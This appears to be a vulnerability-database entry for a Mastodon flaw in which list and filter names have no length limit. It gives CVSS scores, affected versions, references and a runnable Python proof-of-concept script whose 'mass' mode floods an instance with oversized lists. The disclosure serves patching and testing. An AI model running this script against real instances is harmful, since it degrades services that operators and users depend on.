Security Vulnerability Report
CVE-2026-23963 CVSS 4.3 MEDIUM

CVE-2026-23963

Published: 2026-01-22 03:15:47
Last Modified: 2026-02-02 20:27:15

Description

Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.5.5, 4.4.12, and 4.3.18, the server does not enforce a maximum length for the names of lists or filters, or for filter keywords, allowing any user to set an arbitrarily long string as the name or keyword. Any local user can abuse the list or filter fields to cause disproportionate storage and computing resource usage. They can additionally cause their own web interface to be unusable, although they must intentionally do this to themselves or unknowingly approve a malicious API client. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched. Practical reading: exploitation requires an authenticated account on the instance (CVSS PR:L) — or an OAuth client that such an account has approved — so the exposure is resource abuse by registered users rather than by unauthenticated remote attackers; there is no configuration workaround described, and the fix is to upgrade to a patched release, which operators of open-registration instances should prioritise.

CVSS Details

CVSS Score
4.3 (CNA / GitHub secondary metric)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
Note: the headline score above is the CNA's secondary metric. NVD's primary analysis (see the raw JSON below) rates the same issue 6.5 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H, i.e. it treats the availability impact as HIGH rather than LOW; use whichever your organisation's scoring policy prefers, but do not assume 4.3 is the only published rating. The weakness is classified as CWE-770 (Allocation of Resources Without Limits or Throttling).

Configurations (Affected Products)

cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* — versions before 4.3.18 — VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* — versions 4.4.0 up to but excluding 4.4.12 — VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* — versions 4.5.0 up to but excluding 4.5.5 — VULNERABLE
Mastodon < 4.3.18
Mastodon 4.4.0 – 4.4.11 (fixed in 4.4.12)
Mastodon 4.5.0 – 4.5.4 (fixed in 4.5.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
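"""CVE-2026-23963 proof of concept: Mastodon resource exhaustion via unbounded list/filter names.

Prior to Mastodon 4.5.5 / 4.4.12 / 4.3.18 the server enforced no maximum
length on list titles, filter titles or filter keywords, so an authenticated
user (or an API client that user approved) could store arbitrarily long
strings and drive disproportionate storage/CPU use.  This script submits
oversized list titles and filter keywords through the public API so the
behaviour can be confirmed on an instance you are authorised to test.

Usage:
    python cve_2026_23963_poc.py <target_url> <access_token> <attack_type>
    attack_type is one of: single, filter, mass

Only run this against instances you own or have explicit permission to test:
the "mass" mode deliberately degrades the target.  Use ``delete_list`` on the
returned ids afterwards to remove what the test created.
"""

import json
import sys

import requests

# Endpoint paths kept identical to the original PoC so results stay comparable.
LISTS_ENDPOINT = '/api/v1/lists'
FILTERS_ENDPOINT = '/api/v2/filters'


class MastodonResourceExhaustion:
    """Drive the vulnerable list/filter endpoints of a Mastodon instance.

    Args:
        target_url: Base URL of the instance, e.g. ``https://mastodon.example.com``.
        access_token: OAuth bearer token for a local account.  The account (or
            approved client) must be permitted to create lists and filters —
            confirm the token's scopes against the instance before testing.
        timeout: Seconds to wait for each HTTP request (keyword-only).
    """

    def __init__(self, target_url, access_token, *, timeout=30):
        self.target_url = target_url.rstrip('/')
        self.access_token = access_token
        self.timeout = timeout
        self.headers = {
            'Authorization': f'Bearer {access_token}',
            'Content-Type': 'application/json',
        }
        # One session so repeated calls (the "mass" mode) reuse the TCP/TLS
        # connection instead of handshaking once per request.
        self.session = requests.Session()
        self.session.headers.update(self.headers)

    def _post_json(self, path, payload, what):
        """POST *payload* as JSON to *path*; return the decoded body on a 2xx reply, else None.

        *what* names the object being created ("list", "filter 3") for the
        failure messages.  Network errors and non-JSON bodies are reported on
        stdout rather than raised so one failed request does not abort a batch.
        """
        url = f'{self.target_url}{path}'
        try:
            response = self.session.post(url, json=payload, timeout=self.timeout)
        except requests.RequestException as exc:
            print(f'[-] Error: {exc}')
            return None
        # Any 2xx is a success; the original accepted only 200, which would
        # mis-report a 201 Created as a failure.
        if not response.ok:
            print(f'[-] Failed to create {what}. Status: {response.status_code}')
            print(f'[-] Response: {response.text}')
            return None
        try:
            return response.json()
        except ValueError:
            print(f'[-] Error: response for {what} was not valid JSON')
            return None

    def create_long_list_name(self, list_name_length=100000):
        """Create one list whose title is *list_name_length* copies of ``'A'``.

        Returns:
            The new list's ``id`` as returned by the API on success, else None.
        """
        payload = {'title': 'A' * list_name_length}
        data = self._post_json(LISTS_ENDPOINT, payload, 'list')
        if data is None:
            return None
        list_id = data.get('id')
        print(f'[+] Successfully created list with name length: {list_name_length}')
        print(f'[+] List ID: {list_id}')
        return list_id

    def create_filter_with_long_keywords(self, keyword_length=100000, keyword_count=10):
        """Create *keyword_count* filters, each keyed on a *keyword_length*-char ``'B'`` string.

        NOTE(review): the payload keeps the original PoC's field names
        (``phrase`` / ``irreversible`` / ``whole_word``) while posting to the
        v2 filters endpoint.  If the target rejects these requests, check the
        instance's API documentation for the v2 field names before concluding
        that the instance is patched.
        """
        for index in range(1, keyword_count + 1):
            payload = {
                'phrase': 'B' * keyword_length,
                'context': ['home', 'notifications', 'public', 'thread'],
                'irreversible': False,
                'whole_word': False,
            }
            data = self._post_json(FILTERS_ENDPOINT, payload, f'filter {index}')
            if data is None:
                continue
            print(f'[+] Created filter {index}/{keyword_count} with keyword length: {keyword_length}')
            print(f'[+] Filter ID: {data.get("id")}')

    def mass_create_exhaustion(self, count=100, name_length=50000):
        """Create *count* lists with *name_length*-char titles; return the ids created.

        This is the mode that actually stresses the target — it submits
        ``count * name_length`` characters of title data — so keep *count*
        small on shared instances and clean up with ``delete_list`` afterwards.
        """
        print('[*] Starting mass resource exhaustion attack...')
        print(f'[*] Creating {count} lists with {name_length} char names each')
        created_ids = []
        for index in range(1, count + 1):
            list_id = self.create_long_list_name(name_length)
            if list_id:
                created_ids.append(list_id)
            if index % 10 == 0:
                print(f'[*] Progress: {index}/{count} lists created')
        print(f'[+] Attack complete. Created {len(created_ids)} lists')
        print(f'[+] Total characters submitted: {len(created_ids) * name_length}')
        return created_ids

    def delete_list(self, list_id):
        """Delete a list created during testing; return True on a 2xx reply.

        Clean-up helper for authorised tests: removing the oversized rows
        undoes the storage cost the PoC imposed on the instance.
        """
        url = f'{self.target_url}{LISTS_ENDPOINT}/{list_id}'
        try:
            response = self.session.delete(url, timeout=self.timeout)
        except requests.RequestException as exc:
            print(f'[-] Error deleting list {list_id}: {exc}')
            return False
        if not response.ok:
            print(f'[-] Failed to delete list {list_id}. Status: {response.status_code}')
            return False
        return True


def main(argv):
    """Run the mode named in *argv* (program name excluded); return the process exit status."""
    if len(argv) < 3:
        print('Usage: python cve_2026_23963_poc.py <target_url> <access_token> <attack_type>')
        print('Example: python cve_2026_23963_poc.py https://mastodon.example.com your_token single')
        print('Attack types: single, filter, mass')
        return 1
    target, token, attack_type = argv[:3]
    exploit = MastodonResourceExhaustion(target, token)
    if attack_type == 'single':
        exploit.create_long_list_name(100000)
    elif attack_type == 'filter':
        exploit.create_filter_with_long_keywords(100000, 10)
    elif attack_type == 'mass':
        exploit.mass_create_exhaustion(100, 50000)
    else:
        print('Unknown attack type')
        return 1
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv[1:]))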

References

https://github.com/mastodon/mastodon/security/advisories/GHSA-6x3w-9g92-gvf3 (Vendor Advisory)
https://github.com/mastodon/mastodon/releases/tag/v4.3.18 (Release Notes)
https://github.com/mastodon/mastodon/releases/tag/v4.4.12 (Release Notes)
https://github.com/mastodon/mastodon/releases/tag/v4.5.5 (Release Notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23963", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:46.550", "lastModified": "2026-02-02T20:27:15.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.5.5, 4.4.12, and 4.3.18, the server does not enforce a maximum length for the names of lists or filters, or for filter keywords, allowing any user to set an arbitrarily long string as the name or keyword. Any local user can abuse the list or filter fields to cause disproportionate storage and computing resource usage. They can additionally cause their own web interface to be unusable, although they must intentionally do this to themselves or unknowingly approve a malicious API client. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched."}, {"lang": "es", "value": "Mastodon es un servidor de red social gratuito, de código abierto, basado en ActivityPub. Antes de las versiones 4.5.5, 4.4.12 y 4.3.18, el servidor no aplica una longitud máxima para los nombres de listas o filtros, ni para las palabras clave de filtro, permitiendo a cualquier usuario establecer una cadena arbitrariamente larga como nombre o palabra clave. Cualquier usuario local puede abusar de los campos de lista o filtro para causar un uso desproporcionado de los recursos de almacenamiento y computación. Adicionalmente, pueden hacer que su propia interfaz web sea inutilizable, aunque deben hacerlo intencionalmente a sí mismos o aprobar sin saberlo un cliente API malicioso. 
Las versiones de Mastodon v4.5.5, v4.4.12, v4.3.18 están parcheadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3.18", "matchCriteriaId": "0ADDA491-E534-4DFB-856F-9D07F38F3A92"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.12", "matchCriteriaId": "9BAA2A25-EE70-4B9F-8848-2CCE9C243077"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0", "versionEndExcluding": "4.5.5", "matchCriteriaId": "71845808-53CF-46D1-9A12-F14F1BAED488"}]}]}], "references": [{"url": "https://github.com/mastodon/mastodon/releases/tag/v4.3.18", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": 
"https://github.com/mastodon/mastodon/releases/tag/v4.4.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/mastodon/mastodon/releases/tag/v4.5.5", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/mastodon/mastodon/security/advisories/GHSA-6x3w-9g92-gvf3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}